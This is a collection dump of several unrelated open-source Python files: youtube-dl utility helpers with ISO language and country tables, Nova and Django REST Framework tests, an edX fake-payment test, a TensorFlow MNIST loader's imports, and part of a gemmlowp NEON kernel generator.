'ta': 'tam',
'te': 'tel',
'tg': 'tgk',
'th': 'tha',
'ti': 'tir',
'tk': 'tuk',
'tl': 'tgl',
'tn': 'tsn',
'to': 'ton',
'tr': 'tur',
'ts': 'tso',
'tt': 'tat',
'tw': 'twi',
'ty': 'tah',
'ug': 'uig',
'uk': 'ukr',
'ur': 'urd',
'uz': 'uzb',
've': 'ven',
'vi': 'vie',
'vo': 'vol',
'wa': 'wln',
'wo': 'wol',
'xh': 'xho',
'yi': 'yid',
'yo': 'yor',
'za': 'zha',
'zh': 'zho',
'zu': 'zul',
}
@classmethod
def short2long(cls, code):
"""Convert language code from ISO 639-1 to ISO 639-2/T"""
return cls._lang_map.get(code[:2])
@classmethod
def long2short(cls, code):
"""Convert language code from ISO 639-2/T to ISO 639-1"""
for short_name, long_name in cls._lang_map.items():
if long_name == code:
return short_name
class ISO3166Utils(object):
# From http://data.okfn.org/data/core/country-list
_country_map = {
'AF': 'Afghanistan',
'AX': 'Åland Islands',
'AL': 'Albania',
'DZ': 'Algeria',
'AS': 'American Samoa',
'AD': 'Andorra',
'AO': 'Angola',
'AI': 'Anguilla',
'AQ': 'Antarctica',
'AG': 'Antigua and Barbuda',
'AR': 'Argentina',
'AM': 'Armenia',
'AW': 'Aruba',
'AU': 'Australia',
'AT': 'Austria',
'AZ': 'Azerbaijan',
'BS': 'Bahamas',
'BH': 'Bahrain',
'BD': 'Bangladesh',
'BB': 'Barbados',
'BY': 'Belarus',
'BE': 'Belgium',
'BZ': 'Belize',
'BJ': 'Benin',
'BM': 'Bermuda',
'BT': 'Bhutan',
'BO': 'Bolivia, Plurinational State of',
'BQ': 'Bonaire, Sint Eustatius and Saba',
'BA': 'Bosnia and Herzegovina',
'BW': 'Botswana',
'BV': 'Bouvet Island',
'BR': 'Brazil',
'IO': 'British Indian Ocean Territory',
'BN': 'Brunei Darussalam',
'BG': 'Bulgaria',
'BF': 'Burkina Faso',
'BI': 'Burundi',
'KH': 'Cambodia',
'CM': 'Cameroon',
'CA': 'Canada',
'CV': 'Cape Verde',
'KY': 'Cayman Islands',
'CF': 'Central African Republic',
'TD': 'Chad',
'CL': 'Chile',
'CN': 'China',
'CX': 'Christmas Island',
'CC': 'Cocos (Keeling) Islands',
'CO': 'Colombia',
'KM': 'Comoros',
'CG': 'Congo',
'CD': 'Congo, the Democratic Republic of the',
'CK': 'Cook Islands',
'CR': 'Costa Rica',
'CI': 'Côte d\'Ivoire',
'HR': 'Croatia',
'CU': 'Cuba',
'CW': 'Curaçao',
'CY': 'Cyprus',
'CZ': 'Czech Republic',
'DK': 'Denmark',
'DJ': 'Djibouti',
'DM': 'Dominica',
'DO': 'Dominican Republic',
'EC': 'Ecuador',
'EG': 'Egypt',
'SV': 'El Salvador',
'GQ': 'Equatorial Guinea',
'ER': 'Eritrea',
'EE': 'Estonia',
'ET': 'Ethiopia',
'FK': 'Falkland Islands (Malvinas)',
'FO': 'Faroe Islands',
'FJ': 'Fiji',
'FI': 'Finland',
'FR': 'France',
'GF': 'French Guiana',
'PF': 'French Polynesia',
'TF': 'French Southern Territories',
'GA': 'Gabon',
'GM': 'Gambia',
'GE': 'Georgia',
'DE': 'Germany',
'GH': 'Ghana',
'GI': 'Gibraltar',
'GR': 'Greece',
'GL': 'Greenland',
'GD': 'Grenada',
'GP': 'Guadeloupe',
'GU': 'Guam',
'GT': 'Guatemala',
'GG': 'Guernsey',
'GN': 'Guinea',
'GW': 'Guinea-Bissau',
'GY': 'Guyana',
'HT': 'Haiti',
'HM': 'Heard Island and McDonald Islands',
'VA': 'Holy See (Vatican City State)',
'HN': 'Honduras',
'HK': 'Hong Kong',
'HU': 'Hungary',
'IS': 'Iceland',
'IN': 'India',
'ID': 'Indonesia',
'IR': 'Iran, Islamic Republic of',
'IQ': 'Iraq',
'IE': 'Ireland',
'IM': 'Isle of Man',
'IL': 'Israel',
'IT': 'Italy',
'JM': 'Jamaica',
'JP': 'Japan',
'JE': 'Jersey',
'JO': 'Jordan',
'KZ': 'Kazakhstan',
'KE': 'Kenya',
'KI': 'Kiribati',
'KP': 'Korea, Democratic People\'s Republic of',
'KR': 'Korea, Republic of',
'KW': 'Kuwait',
'KG': 'Kyrgyzstan',
'LA': 'Lao People\'s Democratic Republic',
'LV': 'Latvia',
'LB': 'Lebanon',
'LS': 'Lesotho',
'LR': 'Liberia',
'LY': 'Libya',
'LI': 'Liechtenstein',
'LT': 'Lithuania',
'LU': 'Luxembourg',
'MO': 'Macao',
'MK': 'Macedonia, the Former Yugoslav Republic of',
'MG': 'Madagascar',
'MW': 'Malawi',
'MY': 'Malaysia',
'MV': 'Maldives',
'ML': 'Mali',
'MT': 'Malta',
'MH': 'Marshall Islands',
'MQ': 'Martinique',
'MR': 'Mauritania',
'MU': 'Mauritius',
'YT': 'Mayotte',
'MX': 'Mexico',
'FM': 'Micronesia, Federated States of',
'MD': 'Moldova, Republic of',
'MC': 'Monaco',
'MN': 'Mongolia',
'ME': 'Montenegro',
'MS': 'Montserrat',
'MA': 'Morocco',
'MZ': 'Mozambique',
'MM': 'Myanmar',
'NA': 'Namibia',
'NR': 'Nauru',
'NP': 'Nepal',
'NL': 'Netherlands',
'NC': 'New Caledonia',
'NZ': 'New Zealand',
'NI': 'Nicaragua',
'NE': 'Niger',
'NG': 'Nigeria',
'NU': 'Niue',
'NF': 'Norfolk Island',
'MP': 'Northern Mariana Islands',
'NO': 'Norway',
'OM': 'Oman',
'PK': 'Pakistan',
'PW': 'Palau',
'PS': 'Palestine, State of',
'PA': 'Panama',
'PG': 'Papua New Guinea',
'PY': 'Paraguay',
'PE': 'Peru',
'PH': 'Philippines',
'PN': 'Pitcairn',
'PL': 'Poland',
'PT': 'Portugal',
'PR': 'Puerto Rico',
'QA': 'Qatar',
'RE': 'Réunion',
'RO': 'Romania',
'RU': 'Russian Federation',
'RW': 'Rwanda',
'BL': 'Saint Barthélemy',
'SH': 'Saint Helena, Ascension and Tristan da Cunha',
'KN': 'Saint Kitts and Nevis',
'LC': 'Saint Lucia',
'MF': 'Saint Martin (French part)',
'PM': 'Saint Pierre and Miquelon',
'VC': 'Saint Vincent and the Grenadines',
'WS': 'Samoa',
'SM': 'San Marino',
'ST': 'Sao Tome and Principe',
'SA': 'Saudi Arabia',
'SN': 'Senegal',
'RS': 'Serbia',
'SC': 'Seychelles',
'SL': 'Sierra Leone',
'SG': 'Singapore',
'SX': 'Sint Maarten (Dutch part)',
'SK': 'Slovakia',
'SI': 'Slovenia',
'SB': 'Solomon Islands',
'SO': 'Somalia',
'ZA': 'South Africa',
'GS': 'South Georgia and the South Sandwich Islands',
'SS': 'South Sudan',
'ES': 'Spain',
'LK': 'Sri Lanka',
'SD': 'Sudan',
'SR': 'Suriname',
'SJ': 'Svalbard and Jan Mayen',
'SZ': 'Swaziland',
'SE': 'Sweden',
'CH': 'Switzerland',
'SY': 'Syrian Arab Republic',
'TW': 'Taiwan, Province of China',
'TJ': 'Tajikistan',
'TZ': 'Tanzania, United Republic of',
'TH': 'Thailand',
'TL': 'Timor-Leste',
'TG': 'Togo',
'TK': 'Tokelau',
'TO': 'Tonga',
'TT': 'Trinidad and Tobago',
'TN': 'Tunisia',
'TR': 'Turkey',
'TM': 'Turkmenistan',
'TC': 'Turks and Caicos Islands',
'TV': 'Tuvalu',
'UG': 'Uganda',
'UA': 'Ukraine',
'AE': 'United Arab Emirates',
'GB': 'United Kingdom',
'US': 'United States',
'UM': 'United States Minor Outlying Islands',
'UY': 'Uruguay',
'UZ': 'Uzbekistan',
'VU': 'Vanuatu',
'VE': 'Venezuela, Bolivarian Republic of',
'VN': 'Viet Nam',
'VG': 'Virgin Islands, British',
'VI': 'Virgin Islands, U.S.',
'WF': 'Wallis and Futuna',
'EH': 'Western Sahara',
'YE': 'Yemen',
'ZM': 'Zambia',
'ZW': 'Zimbabwe',
}
@classmethod
def short2full(cls, code):
"""Convert an ISO 3166-2 country code to the corresponding full name"""
return cls._country_map.get(code.upper())
class PerRequestProxyHandler(compat_urllib_request.ProxyHandler):
def __init__(self, proxies=None):
# Set default handlers
for type in ('http', 'https'):
setattr(self, '%s_open' % type,
lambda r, proxy='__noproxy__', type=type, meth=self.proxy_open:
meth(r, proxy, type))
return compat_urllib_request.ProxyHandler.__init__(self, proxies)
def proxy_open(self, req, proxy, type):
req_proxy = req.headers.get('Ytdl-request-proxy')
if req_proxy is not None:
proxy = req_proxy
del req.headers['Ytdl-request-proxy']
if proxy == '__noproxy__':
return None # No Proxy
if compat_urlparse.urlparse(proxy).scheme.lower() in ('socks', 'socks4', 'socks4a', 'socks5'):
req.add_header('Ytdl-socks-proxy', proxy)
# youtube-dl's http/https handlers do wrapping the socket with socks
return None
return compat_urllib_request.ProxyHandler.proxy_open(
self, req, proxy, type)
def ohdave_rsa_encrypt(data, exponent, modulus):
'''
Implement OHDave's RSA algorithm. See http://www.ohdave.com/rsa/
Input:
data: data to encrypt, bytes-like object
exponent, modulus: parameter e and N of RSA algorithm, both integer
Output: hex string of encrypted data
Limitation: supports one block encryption only
'''
payload = int(binascii.hexlify(data[::-1]), 16)
encrypted = pow(payload, exponent, modulus)
return '%x' % encrypted
def encode_base_n(num, n, table=None):
FULL_TABLE = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
if not table:
table = FULL_TABLE[:n]
if n > len(table):
raise ValueError('base %d exceeds table length %d' % (n, len(table)))
if num == 0:
return table[0]
ret = ''
while num:
ret = table[num % n] + ret
num = num // n
return ret
def decode_packed_codes(code):
mobj = re.search(
r"}\('(.+)',(\d+),(\d+),'([^']+)'\.split\('\|'\)",
code)
obfucasted_code, base, count, symbols = mobj.groups()
base = int(base)
count = int(count)
symbols = symbols.split('|')
symbol_table = {}
while count:
count -= 1
base_n_count = encode_base_n(count, base)
symbol_table[base_n_count] = symbols[count] or base_n_count
return re.sub(
r'\b(\w+)\b', lambda mobj: symbol_table[mobj.group(0)],
obfucasted_code)
def parse_m3u8_attributes(attrib):
info = {}
for (key, val) in re.findall(r'(?P<key>[A-Z0-9-]+)=(?P<val>"[^"]+"|[^",]+)(?:,|$)', attrib):
if val.startswith('"'):
val = val[1:-1]
info[key] = val
return info
def urshift(val, n):
return val >> n if val >= 0 else (val + 0x100000000) >> n
|
j-carpentier/nova
|
refs/heads/master
|
nova/tests/functional/api_sample_tests/test_extended_availability_zone.py
|
21
|
# Copyright 2012 Nebula, Inc.
# Copyright 2013 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
from nova.tests.functional.api_sample_tests import test_servers
CONF = cfg.CONF
CONF.import_opt('osapi_compute_extension',
'nova.api.openstack.compute.legacy_v2.extensions')
class ExtendedAvailabilityZoneJsonTests(test_servers.ServersSampleBase):
extension_name = "os-extended-availability-zone"
def _get_flags(self):
f = super(ExtendedAvailabilityZoneJsonTests, self)._get_flags()
f['osapi_compute_extension'] = CONF.osapi_compute_extension[:]
f['osapi_compute_extension'].append(
'nova.api.openstack.compute.contrib.keypairs.Keypairs')
f['osapi_compute_extension'].append(
'nova.api.openstack.compute.contrib.extended_availability_zone.'
'Extended_availability_zone')
f['osapi_compute_extension'].append(
'nova.api.openstack.compute.contrib.extended_ips.Extended_ips')
f['osapi_compute_extension'].append(
'nova.api.openstack.compute.contrib.extended_ips_mac.'
'Extended_ips_mac')
return f
def test_show(self):
uuid = self._post_server()
response = self._do_get('servers/%s' % uuid)
subs = self._get_regexes()
subs['hostid'] = '[a-f0-9]+'
subs['access_ip_v4'] = '1.2.3.4'
subs['access_ip_v6'] = '80fe::'
self._verify_response('server-get-resp', subs, response, 200)
def test_detail(self):
self._post_server()
response = self._do_get('servers/detail')
subs = self._get_regexes()
subs['hostid'] = '[a-f0-9]+'
subs['access_ip_v4'] = '1.2.3.4'
subs['access_ip_v6'] = '80fe::'
self._verify_response('servers-detail-resp', subs, response, 200)
|
d0ugal/django-rest-framework
|
refs/heads/master
|
tests/test_serializer.py
|
5
|
# coding: utf-8
from __future__ import unicode_literals
from .utils import MockObject
from rest_framework import serializers
from rest_framework.compat import unicode_repr
import pickle
import pytest
# Tests for core functionality.
# -----------------------------
class TestSerializer:
def setup(self):
class ExampleSerializer(serializers.Serializer):
char = serializers.CharField()
integer = serializers.IntegerField()
self.Serializer = ExampleSerializer
def test_valid_serializer(self):
serializer = self.Serializer(data={'char': 'abc', 'integer': 123})
assert serializer.is_valid()
assert serializer.validated_data == {'char': 'abc', 'integer': 123}
assert serializer.errors == {}
def test_invalid_serializer(self):
serializer = self.Serializer(data={'char': 'abc'})
assert not serializer.is_valid()
assert serializer.validated_data == {}
assert serializer.errors == {'integer': ['This field is required.']}
def test_partial_validation(self):
serializer = self.Serializer(data={'char': 'abc'}, partial=True)
assert serializer.is_valid()
assert serializer.validated_data == {'char': 'abc'}
assert serializer.errors == {}
def test_empty_serializer(self):
serializer = self.Serializer()
assert serializer.data == {'char': '', 'integer': None}
def test_missing_attribute_during_serialization(self):
class MissingAttributes:
pass
instance = MissingAttributes()
serializer = self.Serializer(instance)
with pytest.raises(AttributeError):
serializer.data
class TestValidateMethod:
def test_non_field_error_validate_method(self):
class ExampleSerializer(serializers.Serializer):
char = serializers.CharField()
integer = serializers.IntegerField()
def validate(self, attrs):
raise serializers.ValidationError('Non field error')
serializer = ExampleSerializer(data={'char': 'abc', 'integer': 123})
assert not serializer.is_valid()
assert serializer.errors == {'non_field_errors': ['Non field error']}
def test_field_error_validate_method(self):
class ExampleSerializer(serializers.Serializer):
char = serializers.CharField()
integer = serializers.IntegerField()
def validate(self, attrs):
raise serializers.ValidationError({'char': 'Field error'})
serializer = ExampleSerializer(data={'char': 'abc', 'integer': 123})
assert not serializer.is_valid()
assert serializer.errors == {'char': ['Field error']}
class TestBaseSerializer:
def setup(self):
class ExampleSerializer(serializers.BaseSerializer):
def to_representation(self, obj):
return {
'id': obj['id'],
'email': obj['name'] + '@' + obj['domain']
}
def to_internal_value(self, data):
name, domain = str(data['email']).split('@')
return {
'id': int(data['id']),
'name': name,
'domain': domain,
}
self.Serializer = ExampleSerializer
def test_serialize_instance(self):
instance = {'id': 1, 'name': 'tom', 'domain': 'example.com'}
serializer = self.Serializer(instance)
assert serializer.data == {'id': 1, 'email': 'tom@example.com'}
def test_serialize_list(self):
instances = [
{'id': 1, 'name': 'tom', 'domain': 'example.com'},
{'id': 2, 'name': 'ann', 'domain': 'example.com'},
]
serializer = self.Serializer(instances, many=True)
assert serializer.data == [
{'id': 1, 'email': 'tom@example.com'},
{'id': 2, 'email': 'ann@example.com'}
]
def test_validate_data(self):
data = {'id': 1, 'email': 'tom@example.com'}
serializer = self.Serializer(data=data)
assert serializer.is_valid()
assert serializer.validated_data == {
'id': 1,
'name': 'tom',
'domain': 'example.com'
}
def test_validate_list(self):
data = [
{'id': 1, 'email': 'tom@example.com'},
{'id': 2, 'email': 'ann@example.com'},
]
serializer = self.Serializer(data=data, many=True)
assert serializer.is_valid()
assert serializer.validated_data == [
{'id': 1, 'name': 'tom', 'domain': 'example.com'},
{'id': 2, 'name': 'ann', 'domain': 'example.com'}
]
class TestStarredSource:
"""
Tests for `source='*'` argument, which is used for nested representations.
For example:
nested_field = NestedField(source='*')
"""
data = {
'nested1': {'a': 1, 'b': 2},
'nested2': {'c': 3, 'd': 4}
}
def setup(self):
class NestedSerializer1(serializers.Serializer):
a = serializers.IntegerField()
b = serializers.IntegerField()
class NestedSerializer2(serializers.Serializer):
c = serializers.IntegerField()
d = serializers.IntegerField()
class TestSerializer(serializers.Serializer):
nested1 = NestedSerializer1(source='*')
nested2 = NestedSerializer2(source='*')
self.Serializer = TestSerializer
def test_nested_validate(self):
"""
A nested representation is validated into a flat internal object.
"""
serializer = self.Serializer(data=self.data)
assert serializer.is_valid()
assert serializer.validated_data == {
'a': 1,
'b': 2,
'c': 3,
'd': 4
}
def test_nested_serialize(self):
"""
An object can be serialized into a nested representation.
"""
instance = {'a': 1, 'b': 2, 'c': 3, 'd': 4}
serializer = self.Serializer(instance)
assert serializer.data == self.data
class TestIncorrectlyConfigured:
def test_incorrect_field_name(self):
class ExampleSerializer(serializers.Serializer):
incorrect_name = serializers.IntegerField()
class ExampleObject:
def __init__(self):
self.correct_name = 123
instance = ExampleObject()
serializer = ExampleSerializer(instance)
with pytest.raises(AttributeError) as exc_info:
serializer.data
msg = str(exc_info.value)
assert msg.startswith(
"Got AttributeError when attempting to get a value for field `incorrect_name` on serializer `ExampleSerializer`.\n"
"The serializer field might be named incorrectly and not match any attribute or key on the `ExampleObject` instance.\n"
"Original exception text was:"
)
class TestUnicodeRepr:
def test_unicode_repr(self):
class ExampleSerializer(serializers.Serializer):
example = serializers.CharField()
class ExampleObject:
def __init__(self):
self.example = '한국'
def __repr__(self):
return unicode_repr(self.example)
instance = ExampleObject()
serializer = ExampleSerializer(instance)
repr(serializer) # Should not error.
class TestNotRequiredOutput:
def test_not_required_output_for_dict(self):
"""
'required=False' should allow a dictionary key to be missing in output.
"""
class ExampleSerializer(serializers.Serializer):
omitted = serializers.CharField(required=False)
included = serializers.CharField()
serializer = ExampleSerializer(data={'included': 'abc'})
serializer.is_valid()
assert serializer.data == {'included': 'abc'}
def test_not_required_output_for_object(self):
"""
'required=False' should allow an object attribute to be missing in output.
"""
class ExampleSerializer(serializers.Serializer):
omitted = serializers.CharField(required=False)
included = serializers.CharField()
def create(self, validated_data):
return MockObject(**validated_data)
serializer = ExampleSerializer(data={'included': 'abc'})
serializer.is_valid()
serializer.save()
assert serializer.data == {'included': 'abc'}
def test_default_required_output_for_dict(self):
"""
'default="something"' should require dictionary key.
We need to handle this as the field will have an implicit
'required=False', but it should still have a value.
"""
class ExampleSerializer(serializers.Serializer):
omitted = serializers.CharField(default='abc')
included = serializers.CharField()
serializer = ExampleSerializer({'included': 'abc'})
with pytest.raises(KeyError):
serializer.data
def test_default_required_output_for_object(self):
"""
'default="something"' should require object attribute.
We need to handle this as the field will have an implicit
'required=False', but it should still have a value.
"""
class ExampleSerializer(serializers.Serializer):
omitted = serializers.CharField(default='abc')
included = serializers.CharField()
instance = MockObject(included='abc')
serializer = ExampleSerializer(instance)
with pytest.raises(AttributeError):
serializer.data
class TestCacheSerializerData:
def test_cache_serializer_data(self):
"""
Caching serializer data with pickle will drop the serializer info,
but does preserve the data itself.
"""
class ExampleSerializer(serializers.Serializer):
field1 = serializers.CharField()
field2 = serializers.CharField()
serializer = ExampleSerializer({'field1': 'a', 'field2': 'b'})
pickled = pickle.dumps(serializer.data)
data = pickle.loads(pickled)
assert data == {'field1': 'a', 'field2': 'b'}
|
sbalde/edxplatform
|
refs/heads/master
|
lms/djangoapps/shoppingcart/tests/test_payment_fake.py
|
147
|
"""
Tests for the fake payment page used in acceptance tests.
"""
from django.test import TestCase
from shoppingcart.processors.CyberSource2 import sign, verify_signatures
from shoppingcart.processors.exceptions import CCProcessorSignatureException
from shoppingcart.tests.payment_fake import PaymentFakeView
from collections import OrderedDict
class PaymentFakeViewTest(TestCase):
"""
Test that the fake payment view interacts
correctly with the shopping cart.
"""
CLIENT_POST_PARAMS = OrderedDict([
('amount', '25.00'),
('currency', 'usd'),
('transaction_type', 'sale'),
('orderNumber', '33'),
('access_key', '123456789'),
('merchantID', 'edx'),
('djch', '012345678912'),
('orderPage_version', 2),
('orderPage_serialNumber', '1234567890'),
('profile_id', "00000001"),
('reference_number', 10),
('locale', 'en'),
('signed_date_time', '2014-08-18T13:59:31Z'),
])
def setUp(self):
super(PaymentFakeViewTest, self).setUp()
# Reset the view state
PaymentFakeView.PAYMENT_STATUS_RESPONSE = "success"
def test_accepts_client_signatures(self):
# Generate shoppingcart signatures
post_params = sign(self.CLIENT_POST_PARAMS)
# Simulate a POST request from the payment workflow
# page to the fake payment page.
resp = self.client.post(
'/shoppingcart/payment_fake', dict(post_params)
)
# Expect that the response was successful
self.assertEqual(resp.status_code, 200)
# Expect that we were served the payment page
# (not the error page)
self.assertIn("Payment Form", resp.content)
def test_rejects_invalid_signature(self):
# Generate shoppingcart signatures
post_params = sign(self.CLIENT_POST_PARAMS)
# Tamper with the signature
post_params['signature'] = "invalid"
# Simulate a POST request from the payment workflow
# page to the fake payment page.
resp = self.client.post(
'/shoppingcart/payment_fake', dict(post_params)
)
# Expect that we got an error
self.assertIn("Error", resp.content)
def test_sends_valid_signature(self):
# Generate shoppingcart signatures
post_params = sign(self.CLIENT_POST_PARAMS)
# Get the POST params that the view would send back to us
resp_params = PaymentFakeView.response_post_params(post_params)
# Check that the client accepts these
try:
verify_signatures(resp_params)
except CCProcessorSignatureException:
self.fail("Client rejected signatures.")
def test_set_payment_status(self):
# Generate shoppingcart signatures
post_params = sign(self.CLIENT_POST_PARAMS)
# Configure the view to declined payments
resp = self.client.put(
'/shoppingcart/payment_fake',
data="decline", content_type='text/plain'
)
self.assertEqual(resp.status_code, 200)
# Check that the decision is "DECLINE"
resp_params = PaymentFakeView.response_post_params(post_params)
self.assertEqual(resp_params.get('decision'), 'DECLINE')
# Configure the view to fail payments
resp = self.client.put(
'/shoppingcart/payment_fake',
data="failure", content_type='text/plain'
)
self.assertEqual(resp.status_code, 200)
# Check that the decision is "REJECT"
resp_params = PaymentFakeView.response_post_params(post_params)
self.assertEqual(resp_params.get('decision'), 'REJECT')
# Configure the view to accept payments
resp = self.client.put(
'/shoppingcart/payment_fake',
data="success", content_type='text/plain'
)
self.assertEqual(resp.status_code, 200)
# Check that the decision is "ACCEPT"
resp_params = PaymentFakeView.response_post_params(post_params)
self.assertEqual(resp_params.get('decision'), 'ACCEPT')
|
davidenitti/ML
|
refs/heads/master
|
autoencoders/input_data.py
|
165
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Functions for downloading and reading MNIST data."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import gzip
import os
import tempfile
import numpy
from six.moves import urllib
from six.moves import xrange # pylint: disable=redefined-builtin
import tensorflow as tf
from tensorflow.contrib.learn.python.learn.datasets.mnist import read_data_sets
|
maciekcc/gemmlowp
|
refs/heads/master
|
meta/generators/transform_kernels_common.py
|
7
|
# Copyright 2016 The Gemmlowp Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""."""
import common
def _DuplicateGeneralRegister(size, emitter, registers, value, min_register):
register = registers.QuadRegister(min_register)
emitter.EmitVDup(size, register, value)
return register
def _DuplicateGeneralMemoryRegister(size, emitter, registers, value,
min_register):
register = registers.QuadRegister(min_register)
general = registers.GeneralRegister()
emitter.EmitLdr(general, value)
emitter.EmitVDup(size, register, general)
registers.FreeRegister(general)
return register
class MinMaxTransformation(object):
"""."""
def Check(self, in_type, out_type, kernel_size, leftovers):
assert in_type is 'uint8_t'
assert out_type is 'uint8_t'
assert kernel_size is 16
assert leftovers < 16
def Prepare(self, emitter, registers, unused_kernel_size):
emitter.EmitNewline()
emitter.EmitComment('MinMax::Prepare')
self.min = _DuplicateGeneralRegister(8, emitter, registers,
registers.MapParameter('min',
'params.min'),
4)
self.max = _DuplicateGeneralRegister(8, emitter, registers,
registers.MapParameter('max',
'params.max'),
4)
def Transform(self, emitter, registers, input_address, elements,
output_address):
"""Generate the MinMax transform inner loop code."""
emitter.EmitNewline()
emitter.EmitComment('MinMax::Transform')
register_count = (elements + 15) / 16
load = [registers.QuadRegister() for unused_i in range(register_count)]
emitter.EmitVLoadAE(8, elements, load, input_address, None)
emitter.EmitPldOffset(input_address, emitter.ImmediateConstant(16))
for register in load:
emitter.EmitVMax('u8', register, register, self.min)
for register in load:
emitter.EmitVMin('u8', register, register, self.max)
emitter.EmitNewline()
emitter.EmitVStoreAE(8, elements, load, output_address, None)
emitter.EmitPld(output_address)
registers.FreeRegisters(load)
class DequantizeTransformation(object):
"""."""
def Check(self, in_type, out_type, kernel_size, leftovers):
assert in_type is 'uint8_t'
assert out_type is 'float'
assert kernel_size is 16
assert leftovers < 16
def Prepare(self, emitter, registers, unused_kernel_size):
"""Duplicate quantization offsets to vector registers."""
emitter.EmitNewline()
emitter.EmitComment('Dequantize::Prepare')
self.range_min = _DuplicateGeneralRegister(
32, emitter, registers,
registers.MapParameter('range_min', 'params.range_min'), 4)
self.range_offset = _DuplicateGeneralRegister(
32, emitter, registers,
registers.MapParameter('range_offset', 'params.range_offset'), 4)
self.range_scale = _DuplicateGeneralRegister(
32, emitter, registers,
registers.MapParameter('range_scale', 'params.range_scale'), 4)
def Transform(self, emitter, registers, input_address, elements,
output_address):
"""Emit the dequantization inner loop."""
emitter.EmitNewline()
emitter.EmitComment('Dequantize::Transform')
register_count = (elements + 3) / 4
load = [registers.QuadRegister() for unused_i in range(register_count)]
emitter.EmitVLoadAE(8, elements, load, input_address, None)
emitter.EmitPldOffset(input_address, emitter.ImmediateConstant(32))
if len(load) is 1:
emitter.EmitVMovl('u8', load[0], load[0])
emitter.EmitVMovl('s16', load[0], load[0])
elif len(load) is 2:
emitter.EmitVMovl('u8', load[0], load[0])
emitter.EmitVMovl2('s16', load[0], load[1], load[0])
elif len(load) is 3:
emitter.EmitVMovl2('u8', load[0], load[1], load[0])
emitter.EmitVMovl('s16', load[2], load[1])
emitter.EmitVMovl2('s16', load[0], load[1], load[0])
elif len(load) is 4:
emitter.EmitVMovl2('u8', load[0], load[1], load[0])
emitter.EmitVMovl2('s16', load[2], load[3], load[1])
emitter.EmitVMovl2('s16', load[0], load[1], load[0])
else:
assert False
for register in load:
emitter.EmitVCvt('f32', 's32', register, register)
for register in load:
emitter.EmitVSub('f32', register, register, self.range_offset)
for register in load:
emitter.EmitVMul('f32', register, register, self.range_scale)
for register in load:
emitter.EmitVAdd('f32', register, register, self.range_min)
emitter.EmitNewline()
emitter.EmitVStoreAE(32, elements, load, output_address, None)
emitter.EmitPld(output_address)
registers.FreeRegisters(load)
class QuantizeTransformation(object):
"""."""
def Check(self, in_type, out_type, kernel_size, leftovers):
assert in_type is 'float'
assert out_type is 'uint8_t'
assert kernel_size is 16
assert leftovers < 16
def Prepare(self, emitter, registers, unused_kernel_size):
"""Duplicate quantization offsets to vector registers."""
emitter.EmitNewline()
emitter.EmitComment('Quantize::Prepare')
self.range_min = _DuplicateGeneralRegister(
32, emitter, registers,
registers.MapParameter('range_min', 'params.range_min'), 4)
self.range_offset = _DuplicateGeneralRegister(
32, emitter, registers,
registers.MapParameter('range_offset', 'params.range_offset'), 4)
self.range_scale = _DuplicateGeneralRegister(
32, emitter, registers,
registers.MapParameter('range_scale', 'params.range_scale'), 4)
def Transform(self, emitter, registers, input_address, elements,
output_address):
"""Emit quantization inner loop code."""
emitter.EmitNewline()
emitter.EmitComment('Quantize::Transform')
register_count = (elements + 3) / 4
load = [registers.QuadRegister() for unused_i in range(register_count)]
emitter.EmitVLoadAE(32, elements, load, input_address, None)
emitter.EmitPldOffset(input_address, emitter.ImmediateConstant(64))
for register in load:
emitter.EmitVSub('f32', register, register, self.range_min)
for register in load:
emitter.EmitVMul('f32', register, register, self.range_scale)
for register in load:
emitter.EmitVAdd('f32', register, register, self.range_offset)
for register in load:
emitter.EmitVCvt('s32', 'f32', register, register)
if len(load) is 1:
emitter.EmitVQmovn('s32', load[0], load[0])
emitter.EmitVQmovun('s16', load[0], load[0])
elif len(load) is 2:
emitter.EmitVQmovn2('s32', load[0], load[0], load[1])
emitter.EmitVQmovun('s16', load[0], load[0])
elif len(load) is 3:
emitter.EmitVQmovn2('s32', load[0], load[0], load[1])
emitter.EmitVQmovn('s32', load[2], load[2])
emitter.EmitVQmovun2('s16', load[0], load[0], load[2])
elif len(load) is 4:
emitter.EmitVQmovn2('s32', load[0], load[0], load[1])
emitter.EmitVQmovn2('s32', load[2], load[2], load[3])
emitter.EmitVQmovun2('s16', load[0], load[0], load[2])
else:
assert False
emitter.EmitNewline()
emitter.EmitVStoreAE(8, elements, load, output_address, None)
emitter.EmitPld(output_address)
registers.FreeRegisters(load)
class RequantizeTransformation(object):
"""."""
def Check(self, in_type, out_type, kernel_size, leftovers):
assert in_type is 'int32_t'
assert out_type is 'uint8_t'
assert kernel_size is 16
assert leftovers < 16
def Prepare(self, emitter, registers, unused_kernel_size):
"""Duplicate quantization parameters to vector registers."""
emitter.EmitNewline()
emitter.EmitComment('Requantize::Prepare')
self.range_min_delta = _DuplicateGeneralRegister(
32, emitter, registers,
registers.MapParameter('input_range_min', 'params.input_range_min'), 4)
self.output_range_min = _DuplicateGeneralRegister(
32, emitter, registers,
registers.MapParameter('output_range_min', 'params.output_range_min'),
4)
self.input_range_offset = _DuplicateGeneralRegister(
32, emitter, registers,
registers.MapParameter('input_range_offset',
'params.input_range_offset'), 4)
